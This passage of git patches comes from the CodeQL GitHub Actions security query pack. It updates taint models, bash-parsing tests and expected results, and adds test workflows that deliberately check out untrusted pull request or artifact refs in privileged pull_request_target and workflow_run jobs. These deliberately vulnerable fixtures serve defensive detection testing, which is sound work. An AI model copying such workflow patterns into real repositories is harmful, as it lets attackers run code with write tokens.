taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| paulschuberth/regex-extract-action | * | input.haystack | output.matches | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| release-kit/regex | * | input.string | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE=$(ls \| grep -E "*.(tar.gz\|zip)$") | +isBashParameterExpansion +| parameter1 | | | +| parameter2 | | | +| parameter3 | ! | | +| parameter4 | # | | +| parameter5 | :- | value | +| parameter6 | : | =value | +| parameter7 | :+ | value | +| parameter8 | : | ?value | +| parameter9 | : | =default value | +| parameter10 | ## | */ | +| parameter11 | /# | pattern/string | +| parameter12 | /% | pattern/string | +| parameter13 | , | pattern | +| parameter14 | ,, | pattern | +| parameter15 | ^ | pattern | +| parameter16 | ^^ | pattern | +| parameter17 | : | start | +| parameter18 | # | pattern | +| parameter19 | ## | pattern | +| parameter20 | % | pattern | +| parameter21 | %% | pattern | +| parameter22 | / | pattern/string | +| parameter23 | // | pattern/string | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 03f9e5b1840..e4c1d9e443d 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -21,8 +21,6 @@ query predicate extJobs(ExternalJob s) { any() } query predicate steps(Step s) { any() } -query predicate runSteps(Run run, string body) { run.getScript() = body } - query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } query predicate uses(Uses s) { any() } @@ -59,8 +57,6 @@ query predicate summaries( actionsSummaryModel(action, version, input, output, kind, provenance) } -query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } - query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } query string testNormalizeExpr(string s) { @@ -86,57 +82,6 @@ query predicate writeToGitHubEnv1(string content) { ) } -query predicate writeToGitHubEnv(string key, string value, string content) { - exists(string t | - t = - [ - // block - "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", - "{\necho 'VAR1<> \"$GITHUB_ENV\"", - "{\necho 'VAR2<> \"$GITHUB_ENV\"", - "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", - // multiline - "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", - "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho \"EOF\" >> \"${GITHUB_ENV}\"", - // heredoc 1 - "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", - "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", - "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", - "echo 'VAR14=$(> $GITHUB_ENV", - "echo VAR15=$(> $GITHUB_ENV", - "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", - ] and - Bash::extractFileWrite(t, "GITHUB_ENV", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - -query predicate writeToGitHubOutput(string key, string value, string content) { - exists(string t | - t = - [ - "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", - "echo 'VAR5=$(> $GITHUB_OUTPUT", - "echo VAR6=$(> $GITHUB_OUTPUT", - "echo VAR7=$(> \"$GITHUB_OUTPUT\"", - "echo VAR8=$(> ${GITHUB_OUTPUT}", - "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", - ] and - Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - query predicate isBashParameterExpansion(string parameter, string operator, string params) { exists(string test | test = diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml new file mode 100644 index 00000000000..72db8c29370 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -0,0 +1,36 @@ +on: + workflow_call: + inputs: + comment: + type: string + required: true + outputs: + SHOULD_RUN: + value: ${{ jobs.resolve.outputs.SHOULD_RUN }} + GIT_REF: + value: ${{ jobs.resolve.outputs.GIT_REF }} +jobs: + resolve: + runs-on: ubuntu-latest + outputs: + SHOULD_RUN: ${{ steps.resolve-step.outputs.SHOULD_RUN }} + GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - if: github.event_name == 'workflow_run' + uses: ./.github/actions/download-artifact + - id: resolve-step + env: + ALLOWED_COMMENT: ${{ inputs.comment }} + run: | + if [[ "${{ github.event_name }}" == "workflow_run" ]]; then + if [[ "$(head -n 1 /tmp/artifacts/metadata.txt)" == *"$ALLOWED_COMMENT"* ]]; then + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=false >> "$GITHUB_OUTPUT" + fi + echo GIT_REF="$(tail -n 1 /tmp/artifacts/metadata.txt)" >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + echo GIT_REF="" >> "$GITHUB_OUTPUT" + fi diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml new file mode 100644 index 00000000000..32f45698a56 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml @@ -0,0 +1,22 @@ +on: + schedule: + - cron: '7 18 * * *' + workflow_run: + workflows: [Trigger] + types: [completed] + workflow_dispatch: +jobs: + resolve: + if: (github.repository == 'test/test' && (github.event_name != 'workflow_run' || github.event.workflow_run.conclusion == 'success')) || github.event_name == 'workflow_dispatch' + uses: ./.github/workflows/resolve-args.yml + with: + comment: "foo" + scale: + permissions: + id-token: write + statuses: write + needs: [resolve] + if: needs.resolve.outputs.SHOULD_RUN == 'true' + uses: ./.github/workflows/test27.yml + with: + git_ref: ${{ needs.resolve.outputs.GIT_REF }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml new file mode 100644 index 00000000000..b1d776ef6c8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -0,0 +1,22 @@ +on: + workflow_dispatch: + inputs: + git_ref: + description: ref + type: string + workflow_call: + inputs: + git_ref: + type: string +jobs: + run: + permissions: + id-token: write + statuses: write + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ inputs.git_ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml new file mode 100644 index 00000000000..5f67fecc09a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -0,0 +1,20 @@ +on: + pull_request_target: + types: [opened, ready_for_review, synchronize, reopened, labeled, unlabeled] + branches: + - main + +permissions: + contents: read + +jobs: + setup-environment: + permissions: + contents: write + runs-on: ubuntu-latest + if: ${{ !contains(github.event.pull_request.labels.*.name, 'major-update') && (github.actor == 'renovate[bot]' || contains(github.event.pull_request.labels.*.name, 'renovatebot')) }} + steps: + - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ github.head_ref }} + - run: make foo diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de8..ec6a664a7ab 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -7,6 +7,7 @@ edges | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | @@ -172,6 +173,9 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -279,6 +283,8 @@ edges | .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | +| .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -318,10 +324,8 @@ edges | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | @@ -338,10 +342,10 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index a476bdc22d8..2b9bf3f2b79 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,6 +1,9 @@ | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From fe9c9088809ee4857fe9ef36d99ce7e4becdc554 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 14:18:20 +0200 Subject: [PATCH 0635/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a818ba5362a..a8fab786181 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.76 +version: 0.1.77 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fe6bdb0d77e..f5924ff430c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.76 +version: 0.1.77 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6136a987643087be93aeaa1b29069f688b9a416a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:54:04 +0100 Subject: [PATCH 0636/1267] Add getEvent to RemoteFlowSource for events able to trigger the source --- .../codeql/actions/dataflow/FlowSources.qll | 46 ++++++++++++++++--- 1 file changed, 40 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7dfdc42b05e..fa964f475cf 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -18,39 +18,47 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + /** Gets the event that triggered the source. */ + abstract Event getEvent(); + override string getThreatModel() { result = "remote" } } class GitHubCtxSource extends RemoteFlowSource { string flag; + Event event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; + Event event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getATriggerEvent() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or @@ -65,12 +73,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } string getContext() { result = context } + + override Event getEvent() { result = event } } abstract class CommandSource extends RemoteFlowSource { abstract string getCommand(); abstract Run getEnclosingRun(); + + override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } } class GitCommandSource extends RemoteFlowSource, CommandSource { @@ -181,18 +193,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; + Event event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -206,6 +219,8 @@ class GitHubEventJsonSource extends RemoteFlowSource { } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } /** @@ -217,6 +232,8 @@ class MaDSource extends RemoteFlowSource { MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } abstract class FileSource extends RemoteFlowSource { } @@ -228,12 +245,16 @@ class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { + Event event; + CheckoutSource() { // This should be: // source instanceof PRHeadCheckoutStep @@ -245,7 +266,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() + event = uses.getATriggerEvent() and + event.getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout @@ -258,6 +280,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = event } } /** @@ -273,6 +297,8 @@ class DornyPathsFilterSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -294,6 +320,8 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -315,6 +343,8 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { @@ -327,6 +357,8 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -348,4 +380,6 @@ class OctokitRequestActionSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } From e34835f71a8fd247afc4ea95d5f8d55785bf6cbb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:23 +0100 Subject: [PATCH 0637/1267] fix: AstNode.getATriggerEvent() getATriggerEvent did not work for nodes outside a Job. If there is no enclosing job, get the trigger from the enclosing workflow --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ce6db22636c..5f33400bb96 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -114,7 +114,11 @@ abstract class AstNodeImpl extends TAstNode { /** * Gets and Event triggering this node. */ - EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingJob().getATriggerEvent() + or + not exists(this.getEnclosingJob()) 